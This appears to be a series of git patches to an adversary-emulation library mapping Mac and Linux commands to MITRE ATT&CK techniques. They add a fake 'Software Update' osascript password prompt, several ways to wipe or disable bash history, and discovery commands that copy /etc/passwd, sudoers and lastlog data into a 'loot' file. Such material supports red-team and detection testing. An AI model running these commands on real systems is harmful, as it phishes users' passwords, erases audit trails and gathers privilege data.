From 1cb5f30dc069bc507f73765ad4d8bfc0ccf09377 Mon Sep 17 00:00:00 2001
From: Michael Haag <michaelahaag@gmail.com>
Date: Tue, 2 Jan 2018 07:52:43 -0700
Subject: [PATCH 1/6] Update Input_Prompt.md

---
 Mac/Credential_Access/Input_Prompt.md | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/Mac/Credential_Access/Input_Prompt.md b/Mac/Credential_Access/Input_Prompt.md
index b2f7e19b..154252c5 100644
--- a/Mac/Credential_Access/Input_Prompt.md
+++ b/Mac/Credential_Access/Input_Prompt.md
@@ -7,4 +7,6 @@ MITRE ATT&CK Technique: [T1141](https://attack.mitre.org/wiki/Technique/T1141)
 
     osascript -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to display dialog "Software Update requires that you type your password to apply changes." & return & return  default answer "" with icon 1 with hidden answer with title "Software Update"'
 
+Reference:
+
 http://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.html

From 7dd644c77b9b2f2af26b538f7b1bd29839287482 Mon Sep 17 00:00:00 2001
From: Jimmy Astle <astle.j@gmail.com>
Date: Tue, 2 Jan 2018 15:36:15 -0500
Subject: [PATCH 2/6] Adding in dev/null bash history symlink

---
 Linux/Defense_Evasion/Clear_Command_History.md | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/Linux/Defense_Evasion/Clear_Command_History.md b/Linux/Defense_Evasion/Clear_Command_History.md
index 66c0f696..eccf9ee6 100644
--- a/Linux/Defense_Evasion/Clear_Command_History.md
+++ b/Linux/Defense_Evasion/Clear_Command_History.md
@@ -16,3 +16,5 @@ MITRE ATT&CK Technique: [T1146](https://attack.mitre.org/wiki/Technique/T1146)
     rm ~/.bash_history
 
     cat /dev/null > ~/.bash_history
+
+    ln -sf /dev/null ~/.bash_history

From 22d7cdcec8a5a9227ee4e7d2096d7a0488bb229c Mon Sep 17 00:00:00 2001
From: Jimmy Astle <astle.j@gmail.com>
Date: Tue, 2 Jan 2018 15:45:53 -0500
Subject: [PATCH 3/6] Echo white space into bach history

---
 Linux/Defense_Evasion/Clear_Command_History.md | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/Linux/Defense_Evasion/Clear_Command_History.md b/Linux/Defense_Evasion/Clear_Command_History.md
index eccf9ee6..59540e46 100644
--- a/Linux/Defense_Evasion/Clear_Command_History.md
+++ b/Linux/Defense_Evasion/Clear_Command_History.md
@@ -15,6 +15,8 @@ MITRE ATT&CK Technique: [T1146](https://attack.mitre.org/wiki/Technique/T1146)
 
     rm ~/.bash_history
 
+    echo "" > ~/.bash_history
+
     cat /dev/null > ~/.bash_history
 
     ln -sf /dev/null ~/.bash_history

From e7d731615e16fc65fb00909255ca95d34495f903 Mon Sep 17 00:00:00 2001
From: Jimmy Astle <astle.j@gmail.com>
Date: Tue, 2 Jan 2018 16:03:14 -0500
Subject: [PATCH 4/6] Adding in a few more account discovery techniques

---
 Linux/Discovery/Account_Discovery.md | 20 ++++++++++++++++++++
 1 file changed, 20 insertions(+)

diff --git a/Linux/Discovery/Account_Discovery.md b/Linux/Discovery/Account_Discovery.md
index 307df472..d9b12fca 100644
--- a/Linux/Discovery/Account_Discovery.md
+++ b/Linux/Discovery/Account_Discovery.md
@@ -6,6 +6,22 @@ List of all accounts:
 
     cat /etc/passwd
 
+List local groups:
+
+     cat /etc/group > /tmp/loot.txt
+
+View sudoers access (requires root):
+
+    cat /etc/sudoers > /tmp/loot.txt
+
+View accounts with UID 0:
+
+    grep 'x:0:' /etc/passwd > /tmp/loot.txt
+
+List opened files by user:
+
+    username=$(echo $HOME | awk -F'/' '{print $3}') && lsof -u $username
+
 Currently logged in:
 
 Local:
@@ -15,3 +31,7 @@ Local:
 Remote:
 
     finger @<computer_name>
+
+Show if a user account has ever logged in remotely:
+
+    lastlog > /tmp/loot.txt

From 7f78ad5ace81740809b3f520cdb3559947d45a36 Mon Sep 17 00:00:00 2001
From: Jimmy Astle <astle.j@gmail.com>
Date: Tue, 2 Jan 2018 17:16:27 -0500
Subject: [PATCH 5/6] Adding in missing table link for Account Discovery

---
 Linux/README.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/Linux/README.md b/Linux/README.md
index ebb84ad4..cfad99c6 100644
--- a/Linux/README.md
+++ b/Linux/README.md
@@ -2,7 +2,7 @@
 
 | Persistence                  | Privilege Escalation          | Defense Evasion               | Credential Access                      | Discovery                              | Lateral Movement                | Execution                | Collection                     | Exfiltration                                  | Command and Control                     |
 |------------------------------|-------------------------------|-------------------------------|----------------------------------------|----------------------------------------|---------------------------------|--------------------------|--------------------------------|-----------------------------------------------|-----------------------------------------|
-| .bash_profile and .bashrc    | Exploitation of Vulnerability | Binary Padding                | [Bash History](Credential_Access/Bash_History.md)                           | Account Discovery                      | Application Deployment Software | Command-Line Interface   | Audio Capture                  | Automated Exfiltration                        | Commonly Used Port                      |
+| .bash_profile and .bashrc    | Exploitation of Vulnerability | Binary Padding                | [Bash History](Credential_Access/Bash_History.md)                           | [Account Discovery](Discovery/Account_Discovery.md)                      | Application Deployment Software | Command-Line Interface   | Audio Capture                  | Automated Exfiltration                        | Commonly Used Port                      |
 | Bootkit                      | Setuid and Setgid             | [Clear Command History](Defense_Evasion/Clear_Command_History.md)          | Brute Force                            | File and Directory Discovery           | Exploitation of Vulnerability   | Graphical User Interface | Automated Collection           | Data Compressed                               | Communication Through Removable Media   |
 | [Cron Job](Persistence/Cron_Job.md)                     | Sudo                          | Disabling Security Tools      | [Create Account](Credential_Access/Create_Account.md)                         | Permission Groups Discovery            | Remote File Copy                | Scripting                | Clipboard Data                 | Data Encrypted                                | Connection Proxy                        |
 | Hidden Files and Directories | Valid Accounts                | Exploitation of Vulnerability | Credentials in Files                   | Process Discovery                      | Remote Services                 | Source                   | Data Staged                    | Data Transfer Size Limits                     | Custom Command and Control Protocol     |

From e36a8e337758a6338af656d9a67c145f2e671f4a Mon Sep 17 00:00:00 2001
From: Jimmy Astle <astle.j@gmail.com>
Date: Tue, 2 Jan 2018 17:20:28 -0500
Subject: [PATCH 6/6] Removing the groups command as that should live in a
 seperate spot

---
 Linux/Discovery/Account_Discovery.md | 4 ----
 1 file changed, 4 deletions(-)

diff --git a/Linux/Discovery/Account_Discovery.md b/Linux/Discovery/Account_Discovery.md
index d9b12fca..4531bba5 100644
--- a/Linux/Discovery/Account_Discovery.md
+++ b/Linux/Discovery/Account_Discovery.md
@@ -6,10 +6,6 @@ List of all accounts:
 
     cat /etc/passwd
 
-List local groups:
-
-     cat /etc/group > /tmp/loot.txt
-
 View sudoers access (requires root):
 
     cat /etc/sudoers > /tmp/loot.txt